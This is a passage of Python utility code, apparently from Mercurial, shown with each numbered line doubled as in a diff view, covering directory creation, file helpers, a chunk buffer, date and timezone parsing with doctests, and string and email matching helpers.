1745 except OSError as err:
1745 except OSError as err:
1746 if err.errno == errno.EEXIST:
1746 if err.errno == errno.EEXIST:
1747 return
1747 return
1748 if err.errno != errno.ENOENT or not name:
1748 if err.errno != errno.ENOENT or not name:
1749 raise
1749 raise
1750 parent = os.path.dirname(os.path.abspath(name))
1750 parent = os.path.dirname(os.path.abspath(name))
1751 if parent == name:
1751 if parent == name:
1752 raise
1752 raise
1753 makedirs(parent, mode, notindexed)
1753 makedirs(parent, mode, notindexed)
1754 try:
1754 try:
1755 makedir(name, notindexed)
1755 makedir(name, notindexed)
1756 except OSError as err:
1756 except OSError as err:
1757 # Catch EEXIST to handle races
1757 # Catch EEXIST to handle races
1758 if err.errno == errno.EEXIST:
1758 if err.errno == errno.EEXIST:
1759 return
1759 return
1760 raise
1760 raise
1761 if mode is not None:
1761 if mode is not None:
1762 os.chmod(name, mode)
1762 os.chmod(name, mode)
1763
1763
1764 def readfile(path):
1764 def readfile(path):
1765 with open(path, 'rb') as fp:
1765 with open(path, 'rb') as fp:
1766 return fp.read()
1766 return fp.read()
1767
1767
1768 def writefile(path, text):
1768 def writefile(path, text):
1769 with open(path, 'wb') as fp:
1769 with open(path, 'wb') as fp:
1770 fp.write(text)
1770 fp.write(text)
1771
1771
1772 def appendfile(path, text):
1772 def appendfile(path, text):
1773 with open(path, 'ab') as fp:
1773 with open(path, 'ab') as fp:
1774 fp.write(text)
1774 fp.write(text)
1775
1775
1776 class chunkbuffer(object):
1776 class chunkbuffer(object):
1777 """Allow arbitrary sized chunks of data to be efficiently read from an
1777 """Allow arbitrary sized chunks of data to be efficiently read from an
1778 iterator over chunks of arbitrary size."""
1778 iterator over chunks of arbitrary size."""
1779
1779
1780 def __init__(self, in_iter):
1780 def __init__(self, in_iter):
1781 """in_iter is the iterator that's iterating over the input chunks."""
1781 """in_iter is the iterator that's iterating over the input chunks."""
1782 def splitbig(chunks):
1782 def splitbig(chunks):
1783 for chunk in chunks:
1783 for chunk in chunks:
1784 if len(chunk) > 2**20:
1784 if len(chunk) > 2**20:
1785 pos = 0
1785 pos = 0
1786 while pos < len(chunk):
1786 while pos < len(chunk):
1787 end = pos + 2 ** 18
1787 end = pos + 2 ** 18
1788 yield chunk[pos:end]
1788 yield chunk[pos:end]
1789 pos = end
1789 pos = end
1790 else:
1790 else:
1791 yield chunk
1791 yield chunk
1792 self.iter = splitbig(in_iter)
1792 self.iter = splitbig(in_iter)
1793 self._queue = collections.deque()
1793 self._queue = collections.deque()
1794 self._chunkoffset = 0
1794 self._chunkoffset = 0
1795
1795
1796 def read(self, l=None):
1796 def read(self, l=None):
1797 """Read L bytes of data from the iterator of chunks of data.
1797 """Read L bytes of data from the iterator of chunks of data.
1798 Returns less than L bytes if the iterator runs dry.
1798 Returns less than L bytes if the iterator runs dry.
1799
1799
1800 If size parameter is omitted, read everything"""
1800 If size parameter is omitted, read everything"""
1801 if l is None:
1801 if l is None:
1802 return ''.join(self.iter)
1802 return ''.join(self.iter)
1803
1803
1804 left = l
1804 left = l
1805 buf = []
1805 buf = []
1806 queue = self._queue
1806 queue = self._queue
1807 while left > 0:
1807 while left > 0:
1808 # refill the queue
1808 # refill the queue
1809 if not queue:
1809 if not queue:
1810 target = 2**18
1810 target = 2**18
1811 for chunk in self.iter:
1811 for chunk in self.iter:
1812 queue.append(chunk)
1812 queue.append(chunk)
1813 target -= len(chunk)
1813 target -= len(chunk)
1814 if target <= 0:
1814 if target <= 0:
1815 break
1815 break
1816 if not queue:
1816 if not queue:
1817 break
1817 break
1818
1818
1819 # The easy way to do this would be to queue.popleft(), modify the
1819 # The easy way to do this would be to queue.popleft(), modify the
1820 # chunk (if necessary), then queue.appendleft(). However, for cases
1820 # chunk (if necessary), then queue.appendleft(). However, for cases
1821 # where we read partial chunk content, this incurs 2 dequeue
1821 # where we read partial chunk content, this incurs 2 dequeue
1822 # mutations and creates a new str for the remaining chunk in the
1822 # mutations and creates a new str for the remaining chunk in the
1823 # queue. Our code below avoids this overhead.
1823 # queue. Our code below avoids this overhead.
1824
1824
1825 chunk = queue[0]
1825 chunk = queue[0]
1826 chunkl = len(chunk)
1826 chunkl = len(chunk)
1827 offset = self._chunkoffset
1827 offset = self._chunkoffset
1828
1828
1829 # Use full chunk.
1829 # Use full chunk.
1830 if offset == 0 and left >= chunkl:
1830 if offset == 0 and left >= chunkl:
1831 left -= chunkl
1831 left -= chunkl
1832 queue.popleft()
1832 queue.popleft()
1833 buf.append(chunk)
1833 buf.append(chunk)
1834 # self._chunkoffset remains at 0.
1834 # self._chunkoffset remains at 0.
1835 continue
1835 continue
1836
1836
1837 chunkremaining = chunkl - offset
1837 chunkremaining = chunkl - offset
1838
1838
1839 # Use all of unconsumed part of chunk.
1839 # Use all of unconsumed part of chunk.
1840 if left >= chunkremaining:
1840 if left >= chunkremaining:
1841 left -= chunkremaining
1841 left -= chunkremaining
1842 queue.popleft()
1842 queue.popleft()
1843 # offset == 0 is enabled by block above, so this won't merely
1843 # offset == 0 is enabled by block above, so this won't merely
1844 # copy via ``chunk[0:]``.
1844 # copy via ``chunk[0:]``.
1845 buf.append(chunk[offset:])
1845 buf.append(chunk[offset:])
1846 self._chunkoffset = 0
1846 self._chunkoffset = 0
1847
1847
1848 # Partial chunk needed.
1848 # Partial chunk needed.
1849 else:
1849 else:
1850 buf.append(chunk[offset:offset + left])
1850 buf.append(chunk[offset:offset + left])
1851 self._chunkoffset += left
1851 self._chunkoffset += left
1852 left -= chunkremaining
1852 left -= chunkremaining
1853
1853
1854 return ''.join(buf)
1854 return ''.join(buf)
1855
1855
1856 def filechunkiter(f, size=131072, limit=None):
1856 def filechunkiter(f, size=131072, limit=None):
1857 """Create a generator that produces the data in the file size
1857 """Create a generator that produces the data in the file size
1858 (default 131072) bytes at a time, up to optional limit (default is
1858 (default 131072) bytes at a time, up to optional limit (default is
1859 to read all data). Chunks may be less than size bytes if the
1859 to read all data). Chunks may be less than size bytes if the
1860 chunk is the last chunk in the file, or the file is a socket or
1860 chunk is the last chunk in the file, or the file is a socket or
1861 some other type of file that sometimes reads less data than is
1861 some other type of file that sometimes reads less data than is
1862 requested."""
1862 requested."""
1863 assert size >= 0
1863 assert size >= 0
1864 assert limit is None or limit >= 0
1864 assert limit is None or limit >= 0
1865 while True:
1865 while True:
1866 if limit is None:
1866 if limit is None:
1867 nbytes = size
1867 nbytes = size
1868 else:
1868 else:
1869 nbytes = min(limit, size)
1869 nbytes = min(limit, size)
1870 s = nbytes and f.read(nbytes)
1870 s = nbytes and f.read(nbytes)
1871 if not s:
1871 if not s:
1872 break
1872 break
1873 if limit:
1873 if limit:
1874 limit -= len(s)
1874 limit -= len(s)
1875 yield s
1875 yield s
1876
1876
1877 def makedate(timestamp=None):
1877 def makedate(timestamp=None):
1878 '''Return a unix timestamp (or the current time) as a (unixtime,
1878 '''Return a unix timestamp (or the current time) as a (unixtime,
1879 offset) tuple based off the local timezone.'''
1879 offset) tuple based off the local timezone.'''
1880 if timestamp is None:
1880 if timestamp is None:
1881 timestamp = time.time()
1881 timestamp = time.time()
1882 if timestamp < 0:
1882 if timestamp < 0:
1883 hint = _("check your clock")
1883 hint = _("check your clock")
1884 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1884 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1885 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1885 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1886 datetime.datetime.fromtimestamp(timestamp))
1886 datetime.datetime.fromtimestamp(timestamp))
1887 tz = delta.days * 86400 + delta.seconds
1887 tz = delta.days * 86400 + delta.seconds
1888 return timestamp, tz
1888 return timestamp, tz
1889
1889
1890 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1890 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1891 """represent a (unixtime, offset) tuple as a localized time.
1891 """represent a (unixtime, offset) tuple as a localized time.
1892 unixtime is seconds since the epoch, and offset is the time zone's
1892 unixtime is seconds since the epoch, and offset is the time zone's
1893 number of seconds away from UTC.
1893 number of seconds away from UTC.
1894
1894
1895 >>> datestr((0, 0))
1895 >>> datestr((0, 0))
1896 'Thu Jan 01 00:00:00 1970 +0000'
1896 'Thu Jan 01 00:00:00 1970 +0000'
1897 >>> datestr((42, 0))
1897 >>> datestr((42, 0))
1898 'Thu Jan 01 00:00:42 1970 +0000'
1898 'Thu Jan 01 00:00:42 1970 +0000'
1899 >>> datestr((-42, 0))
1899 >>> datestr((-42, 0))
1900 'Wed Dec 31 23:59:18 1969 +0000'
1900 'Wed Dec 31 23:59:18 1969 +0000'
1901 >>> datestr((0x7fffffff, 0))
1901 >>> datestr((0x7fffffff, 0))
1902 'Tue Jan 19 03:14:07 2038 +0000'
1902 'Tue Jan 19 03:14:07 2038 +0000'
1903 >>> datestr((-0x80000000, 0))
1903 >>> datestr((-0x80000000, 0))
1904 'Fri Dec 13 20:45:52 1901 +0000'
1904 'Fri Dec 13 20:45:52 1901 +0000'
1905 """
1905 """
1906 t, tz = date or makedate()
1906 t, tz = date or makedate()
1907 if "%1" in format or "%2" in format or "%z" in format:
1907 if "%1" in format or "%2" in format or "%z" in format:
1908 sign = (tz > 0) and "-" or "+"
1908 sign = (tz > 0) and "-" or "+"
1909 minutes = abs(tz) // 60
1909 minutes = abs(tz) // 60
1910 q, r = divmod(minutes, 60)
1910 q, r = divmod(minutes, 60)
1911 format = format.replace("%z", "%1%2")
1911 format = format.replace("%z", "%1%2")
1912 format = format.replace("%1", "%c%02d" % (sign, q))
1912 format = format.replace("%1", "%c%02d" % (sign, q))
1913 format = format.replace("%2", "%02d" % r)
1913 format = format.replace("%2", "%02d" % r)
1914 d = t - tz
1914 d = t - tz
1915 if d > 0x7fffffff:
1915 if d > 0x7fffffff:
1916 d = 0x7fffffff
1916 d = 0x7fffffff
1917 elif d < -0x80000000:
1917 elif d < -0x80000000:
1918 d = -0x80000000
1918 d = -0x80000000
1919 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1919 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1920 # because they use the gmtime() system call which is buggy on Windows
1920 # because they use the gmtime() system call which is buggy on Windows
1921 # for negative values.
1921 # for negative values.
1922 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1922 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1923 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1923 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1924 return s
1924 return s
1925
1925
1926 def shortdate(date=None):
1926 def shortdate(date=None):
1927 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1927 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1928 return datestr(date, format='%Y-%m-%d')
1928 return datestr(date, format='%Y-%m-%d')
1929
1929
1930 def parsetimezone(s):
1930 def parsetimezone(s):
1931 """find a trailing timezone, if any, in string, and return a
1931 """find a trailing timezone, if any, in string, and return a
1932 (offset, remainder) pair"""
1932 (offset, remainder) pair"""
1933
1933
1934 if s.endswith("GMT") or s.endswith("UTC"):
1934 if s.endswith("GMT") or s.endswith("UTC"):
1935 return 0, s[:-3].rstrip()
1935 return 0, s[:-3].rstrip()
1936
1936
1937 # Unix-style timezones [+-]hhmm
1937 # Unix-style timezones [+-]hhmm
1938 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1938 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1939 sign = (s[-5] == "+") and 1 or -1
1939 sign = (s[-5] == "+") and 1 or -1
1940 hours = int(s[-4:-2])
1940 hours = int(s[-4:-2])
1941 minutes = int(s[-2:])
1941 minutes = int(s[-2:])
1942 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1942 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1943
1943
1944 # ISO8601 trailing Z
1944 # ISO8601 trailing Z
1945 if s.endswith("Z") and s[-2:-1].isdigit():
1945 if s.endswith("Z") and s[-2:-1].isdigit():
1946 return 0, s[:-1]
1946 return 0, s[:-1]
1947
1947
1948 # ISO8601-style [+-]hh:mm
1948 # ISO8601-style [+-]hh:mm
1949 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1949 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1950 s[-5:-3].isdigit() and s[-2:].isdigit()):
1950 s[-5:-3].isdigit() and s[-2:].isdigit()):
1951 sign = (s[-6] == "+") and 1 or -1
1951 sign = (s[-6] == "+") and 1 or -1
1952 hours = int(s[-5:-3])
1952 hours = int(s[-5:-3])
1953 minutes = int(s[-2:])
1953 minutes = int(s[-2:])
1954 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1954 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1955
1955
1956 return None, s
1956 return None, s
1957
1957
1958 def strdate(string, format, defaults=None):
1958 def strdate(string, format, defaults=None):
1959 """parse a localized time string and return a (unixtime, offset) tuple.
1959 """parse a localized time string and return a (unixtime, offset) tuple.
1960 if the string cannot be parsed, ValueError is raised."""
1960 if the string cannot be parsed, ValueError is raised."""
1961 if defaults is None:
1961 if defaults is None:
1962 defaults = {}
1962 defaults = {}
1963
1963
1964 # NOTE: unixtime = localunixtime + offset
1964 # NOTE: unixtime = localunixtime + offset
1965 offset, date = parsetimezone(string)
1965 offset, date = parsetimezone(string)
1966
1966
1967 # add missing elements from defaults
1967 # add missing elements from defaults
1968 usenow = False # default to using biased defaults
1968 usenow = False # default to using biased defaults
1969 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1969 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1970 part = pycompat.bytestr(part)
1970 part = pycompat.bytestr(part)
1971 found = [True for p in part if ("%"+p) in format]
1971 found = [True for p in part if ("%"+p) in format]
1972 if not found:
1972 if not found:
1973 date += "@" + defaults[part][usenow]
1973 date += "@" + defaults[part][usenow]
1974 format += "@%" + part[0]
1974 format += "@%" + part[0]
1975 else:
1975 else:
1976 # We've found a specific time element, less specific time
1976 # We've found a specific time element, less specific time
1977 # elements are relative to today
1977 # elements are relative to today
1978 usenow = True
1978 usenow = True
1979
1979
1980 timetuple = time.strptime(encoding.strfromlocal(date),
1980 timetuple = time.strptime(encoding.strfromlocal(date),
1981 encoding.strfromlocal(format))
1981 encoding.strfromlocal(format))
1982 localunixtime = int(calendar.timegm(timetuple))
1982 localunixtime = int(calendar.timegm(timetuple))
1983 if offset is None:
1983 if offset is None:
1984 # local timezone
1984 # local timezone
1985 unixtime = int(time.mktime(timetuple))
1985 unixtime = int(time.mktime(timetuple))
1986 offset = unixtime - localunixtime
1986 offset = unixtime - localunixtime
1987 else:
1987 else:
1988 unixtime = localunixtime + offset
1988 unixtime = localunixtime + offset
1989 return unixtime, offset
1989 return unixtime, offset
1990
1990
1991 def parsedate(date, formats=None, bias=None):
1991 def parsedate(date, formats=None, bias=None):
1992 """parse a localized date/time and return a (unixtime, offset) tuple.
1992 """parse a localized date/time and return a (unixtime, offset) tuple.
1993
1993
1994 The date may be a "unixtime offset" string or in one of the specified
1994 The date may be a "unixtime offset" string or in one of the specified
1995 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1995 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1996
1996
1997 >>> parsedate(b' today ') == parsedate(\
1997 >>> parsedate(b' today ') == parsedate(\
1998 datetime.date.today().strftime('%b %d'))
1998 datetime.date.today().strftime('%b %d'))
1999 True
1999 True
2000 >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
2000 >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
2001 datetime.timedelta(days=1)\
2001 datetime.timedelta(days=1)\
2002 ).strftime('%b %d'))
2002 ).strftime('%b %d'))
2003 True
2003 True
2004 >>> now, tz = makedate()
2004 >>> now, tz = makedate()
2005 >>> strnow, strtz = parsedate(b'now')
2005 >>> strnow, strtz = parsedate(b'now')
2006 >>> (strnow - now) < 1
2006 >>> (strnow - now) < 1
2007 True
2007 True
2008 >>> tz == strtz
2008 >>> tz == strtz
2009 True
2009 True
2010 """
2010 """
2011 if bias is None:
2011 if bias is None:
2012 bias = {}
2012 bias = {}
2013 if not date:
2013 if not date:
2014 return 0, 0
2014 return 0, 0
2015 if isinstance(date, tuple) and len(date) == 2:
2015 if isinstance(date, tuple) and len(date) == 2:
2016 return date
2016 return date
2017 if not formats:
2017 if not formats:
2018 formats = defaultdateformats
2018 formats = defaultdateformats
2019 date = date.strip()
2019 date = date.strip()
2020
2020
2021 if date == 'now' or date == _('now'):
2021 if date == 'now' or date == _('now'):
2022 return makedate()
2022 return makedate()
2023 if date == 'today' or date == _('today'):
2023 if date == 'today' or date == _('today'):
2024 date = datetime.date.today().strftime('%b %d')
2024 date = datetime.date.today().strftime('%b %d')
2025 elif date == 'yesterday' or date == _('yesterday'):
2025 elif date == 'yesterday' or date == _('yesterday'):
2026 date = (datetime.date.today() -
2026 date = (datetime.date.today() -
2027 datetime.timedelta(days=1)).strftime('%b %d')
2027 datetime.timedelta(days=1)).strftime('%b %d')
2028
2028
2029 try:
2029 try:
2030 when, offset = map(int, date.split(' '))
2030 when, offset = map(int, date.split(' '))
2031 except ValueError:
2031 except ValueError:
2032 # fill out defaults
2032 # fill out defaults
2033 now = makedate()
2033 now = makedate()
2034 defaults = {}
2034 defaults = {}
2035 for part in ("d", "mb", "yY", "HI", "M", "S"):
2035 for part in ("d", "mb", "yY", "HI", "M", "S"):
2036 # this piece is for rounding the specific end of unknowns
2036 # this piece is for rounding the specific end of unknowns
2037 b = bias.get(part)
2037 b = bias.get(part)
2038 if b is None:
2038 if b is None:
2039 if part[0:1] in "HMS":
2039 if part[0:1] in "HMS":
2040 b = "00"
2040 b = "00"
2041 else:
2041 else:
2042 b = "0"
2042 b = "0"
2043
2043
2044 # this piece is for matching the generic end to today's date
2044 # this piece is for matching the generic end to today's date
2045 n = datestr(now, "%" + part[0:1])
2045 n = datestr(now, "%" + part[0:1])
2046
2046
2047 defaults[part] = (b, n)
2047 defaults[part] = (b, n)
2048
2048
2049 for format in formats:
2049 for format in formats:
2050 try:
2050 try:
2051 when, offset = strdate(date, format, defaults)
2051 when, offset = strdate(date, format, defaults)
2052 except (ValueError, OverflowError):
2052 except (ValueError, OverflowError):
2053 pass
2053 pass
2054 else:
2054 else:
2055 break
2055 break
2056 else:
2056 else:
2057 raise error.ParseError(_('invalid date: %r') % date)
2057 raise error.ParseError(_('invalid date: %r') % date)
2058 # validate explicit (probably user-specified) date and
2058 # validate explicit (probably user-specified) date and
2059 # time zone offset. values must fit in signed 32 bits for
2059 # time zone offset. values must fit in signed 32 bits for
2060 # current 32-bit linux runtimes. timezones go from UTC-12
2060 # current 32-bit linux runtimes. timezones go from UTC-12
2061 # to UTC+14
2061 # to UTC+14
2062 if when < -0x80000000 or when > 0x7fffffff:
2062 if when < -0x80000000 or when > 0x7fffffff:
2063 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2063 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2064 if offset < -50400 or offset > 43200:
2064 if offset < -50400 or offset > 43200:
2065 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2065 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2066 return when, offset
2066 return when, offset
2067
2067
2068 def matchdate(date):
2068 def matchdate(date):
2069 """Return a function that matches a given date match specifier
2069 """Return a function that matches a given date match specifier
2070
2070
2071 Formats include:
2071 Formats include:
2072
2072
2073 '{date}' match a given date to the accuracy provided
2073 '{date}' match a given date to the accuracy provided
2074
2074
2075 '<{date}' on or before a given date
2075 '<{date}' on or before a given date
2076
2076
2077 '>{date}' on or after a given date
2077 '>{date}' on or after a given date
2078
2078
2079 >>> p1 = parsedate(b"10:29:59")
2079 >>> p1 = parsedate(b"10:29:59")
2080 >>> p2 = parsedate(b"10:30:00")
2080 >>> p2 = parsedate(b"10:30:00")
2081 >>> p3 = parsedate(b"10:30:59")
2081 >>> p3 = parsedate(b"10:30:59")
2082 >>> p4 = parsedate(b"10:31:00")
2082 >>> p4 = parsedate(b"10:31:00")
2083 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2083 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2084 >>> f = matchdate(b"10:30")
2084 >>> f = matchdate(b"10:30")
2085 >>> f(p1[0])
2085 >>> f(p1[0])
2086 False
2086 False
2087 >>> f(p2[0])
2087 >>> f(p2[0])
2088 True
2088 True
2089 >>> f(p3[0])
2089 >>> f(p3[0])
2090 True
2090 True
2091 >>> f(p4[0])
2091 >>> f(p4[0])
2092 False
2092 False
2093 >>> f(p5[0])
2093 >>> f(p5[0])
2094 False
2094 False
2095 """
2095 """
2096
2096
2097 def lower(date):
2097 def lower(date):
2098 d = {'mb': "1", 'd': "1"}
2098 d = {'mb': "1", 'd': "1"}
2099 return parsedate(date, extendeddateformats, d)[0]
2099 return parsedate(date, extendeddateformats, d)[0]
2100
2100
2101 def upper(date):
2101 def upper(date):
2102 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2102 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2103 for days in ("31", "30", "29"):
2103 for days in ("31", "30", "29"):
2104 try:
2104 try:
2105 d["d"] = days
2105 d["d"] = days
2106 return parsedate(date, extendeddateformats, d)[0]
2106 return parsedate(date, extendeddateformats, d)[0]
2107 except Abort:
2107 except Abort:
2108 pass
2108 pass
2109 d["d"] = "28"
2109 d["d"] = "28"
2110 return parsedate(date, extendeddateformats, d)[0]
2110 return parsedate(date, extendeddateformats, d)[0]
2111
2111
2112 date = date.strip()
2112 date = date.strip()
2113
2113
2114 if not date:
2114 if not date:
2115 raise Abort(_("dates cannot consist entirely of whitespace"))
2115 raise Abort(_("dates cannot consist entirely of whitespace"))
2116 elif date[0] == "<":
2116 elif date[0] == "<":
2117 if not date[1:]:
2117 if not date[1:]:
2118 raise Abort(_("invalid day spec, use '<DATE'"))
2118 raise Abort(_("invalid day spec, use '<DATE'"))
2119 when = upper(date[1:])
2119 when = upper(date[1:])
2120 return lambda x: x <= when
2120 return lambda x: x <= when
2121 elif date[0] == ">":
2121 elif date[0] == ">":
2122 if not date[1:]:
2122 if not date[1:]:
2123 raise Abort(_("invalid day spec, use '>DATE'"))
2123 raise Abort(_("invalid day spec, use '>DATE'"))
2124 when = lower(date[1:])
2124 when = lower(date[1:])
2125 return lambda x: x >= when
2125 return lambda x: x >= when
2126 elif date[0] == "-":
2126 elif date[0] == "-":
2127 try:
2127 try:
2128 days = int(date[1:])
2128 days = int(date[1:])
2129 except ValueError:
2129 except ValueError:
2130 raise Abort(_("invalid day spec: %s") % date[1:])
2130 raise Abort(_("invalid day spec: %s") % date[1:])
2131 if days < 0:
2131 if days < 0:
2132 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2132 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2133 % date[1:])
2133 % date[1:])
2134 when = makedate()[0] - days * 3600 * 24
2134 when = makedate()[0] - days * 3600 * 24
2135 return lambda x: x >= when
2135 return lambda x: x >= when
2136 elif " to " in date:
2136 elif " to " in date:
2137 a, b = date.split(" to ")
2137 a, b = date.split(" to ")
2138 start, stop = lower(a), upper(b)
2138 start, stop = lower(a), upper(b)
2139 return lambda x: x >= start and x <= stop
2139 return lambda x: x >= start and x <= stop
2140 else:
2140 else:
2141 start, stop = lower(date), upper(date)
2141 start, stop = lower(date), upper(date)
2142 return lambda x: x >= start and x <= stop
2142 return lambda x: x >= start and x <= stop
2143
2143
2144 def stringmatcher(pattern, casesensitive=True):
2144 def stringmatcher(pattern, casesensitive=True):
2145 """
2145 """
2146 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2146 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2147 returns the matcher name, pattern, and matcher function.
2147 returns the matcher name, pattern, and matcher function.
2148 missing or unknown prefixes are treated as literal matches.
2148 missing or unknown prefixes are treated as literal matches.
2149
2149
2150 helper for tests:
2150 helper for tests:
2151 >>> def test(pattern, *tests):
2151 >>> def test(pattern, *tests):
2152 ... kind, pattern, matcher = stringmatcher(pattern)
2152 ... kind, pattern, matcher = stringmatcher(pattern)
2153 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2153 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2154 >>> def itest(pattern, *tests):
2154 >>> def itest(pattern, *tests):
2155 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2155 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2156 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2156 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2157
2157
2158 exact matching (no prefix):
2158 exact matching (no prefix):
2159 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2159 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2160 ('literal', 'abcdefg', [False, False, True])
2160 ('literal', 'abcdefg', [False, False, True])
2161
2161
2162 regex matching ('re:' prefix)
2162 regex matching ('re:' prefix)
2163 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2163 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2164 ('re', 'a.+b', [False, False, True])
2164 ('re', 'a.+b', [False, False, True])
2165
2165
2166 force exact matches ('literal:' prefix)
2166 force exact matches ('literal:' prefix)
2167 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2167 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2168 ('literal', 're:foobar', [False, True])
2168 ('literal', 're:foobar', [False, True])
2169
2169
2170 unknown prefixes are ignored and treated as literals
2170 unknown prefixes are ignored and treated as literals
2171 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2171 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2172 ('literal', 'foo:bar', [False, False, True])
2172 ('literal', 'foo:bar', [False, False, True])
2173
2173
2174 case insensitive regex matches
2174 case insensitive regex matches
2175 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2175 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2176 ('re', 'A.+b', [False, False, True])
2176 ('re', 'A.+b', [False, False, True])
2177
2177
2178 case insensitive literal matches
2178 case insensitive literal matches
2179 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2179 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2180 ('literal', 'ABCDEFG', [False, False, True])
2180 ('literal', 'ABCDEFG', [False, False, True])
2181 """
2181 """
2182 if pattern.startswith('re:'):
2182 if pattern.startswith('re:'):
2183 pattern = pattern[3:]
2183 pattern = pattern[3:]
2184 try:
2184 try:
2185 flags = 0
2185 flags = 0
2186 if not casesensitive:
2186 if not casesensitive:
2187 flags = remod.I
2187 flags = remod.I
2188 regex = remod.compile(pattern, flags)
2188 regex = remod.compile(pattern, flags)
2189 except remod.error as e:
2189 except remod.error as e:
2190 raise error.ParseError(_('invalid regular expression: %s')
2190 raise error.ParseError(_('invalid regular expression: %s')
2191 % e)
2191 % e)
2192 return 're', pattern, regex.search
2192 return 're', pattern, regex.search
2193 elif pattern.startswith('literal:'):
2193 elif pattern.startswith('literal:'):
2194 pattern = pattern[8:]
2194 pattern = pattern[8:]
2195
2195
2196 match = pattern.__eq__
2196 match = pattern.__eq__
2197
2197
2198 if not casesensitive:
2198 if not casesensitive:
2199 ipat = encoding.lower(pattern)
2199 ipat = encoding.lower(pattern)
2200 match = lambda s: ipat == encoding.lower(s)
2200 match = lambda s: ipat == encoding.lower(s)
2201 return 'literal', pattern, match
2201 return 'literal', pattern, match
2202
2202
2203 def shortuser(user):
2203 def shortuser(user):
2204 """Return a short representation of a user name or email address."""
2204 """Return a short representation of a user name or email address."""
2205 f = user.find('@')
2205 f = user.find('@')
2206 if f >= 0:
2206 if f >= 0:
2207 user = user[:f]
2207 user = user[:f]
2208 f = user.find('<')
2208 f = user.find('<')
2209 if f >= 0:
2209 if f >= 0:
2210 user = user[f + 1:]
2210 user = user[f + 1:]
2211 f = user.find(' ')
2211 f = user.find(' ')
2212 if f >= 0:
2212 if f >= 0:
2213 user = user[:f]
2213 user = user[:f]
2214 f = user.find('.')
2214 f = user.find('.')
2215 if f >= 0:
2215 if f >= 0:
2216 user = user[:f]
2216 user = user[:f]
2217 return user
2217 return user
2218
2218
2219 def emailuser(user):
2219 def emailuser(user):
2220 """Return the user portion of an email address."""
2220 """Return the user portion of an email address."""
2221 f = user.find('@')
2221 f = user.find('@')
2222 if f >= 0:
2222 if f >= 0:
2223 user = user[:f]
2223 user = user[:f]
2224 f = user.find('<')
2224 f = user.find('<')
2225 if f >= 0:
2225 if f >= 0:
2226 user = user[f + 1:]
2226 user = user[f + 1:]
2227 return user
2227 return user
2228
2228
2229 def email(author):
2229 def email(author):
2230 '''get email of author.'''
2230 '''get email of author.'''
2231 r = author.find('>')
2231 r = author.find('>')
2232 if r == -1:
2232 if r == -1:
2233 r = None
2233 r = None
2234 return author[author.find('<') + 1:r]
2234 return author[author.find('<') + 1:r]
2235
2235
2236 def ellipsis(text, maxlength=400):
2236 def ellipsis(text, maxlength=400):
2237 """Trim string to at most maxlength (default: 400) columns in display."""
2237 """Trim string to at most maxlength (default: 400) columns in display."""
2238 return encoding.trim(text, maxlength, ellipsis='...')
2238 return encoding.trim(text, maxlength, ellipsis='...')
2239
2239
2240 def unitcountfn(*unittable):
2240 def unitcountfn(*unittable):
2241 '''return a function that renders a readable count of some quantity'''
2241 '''return a function that renders a readable count of some quantity'''
2242
2242
2243 def go(count):
2243 def go(count):
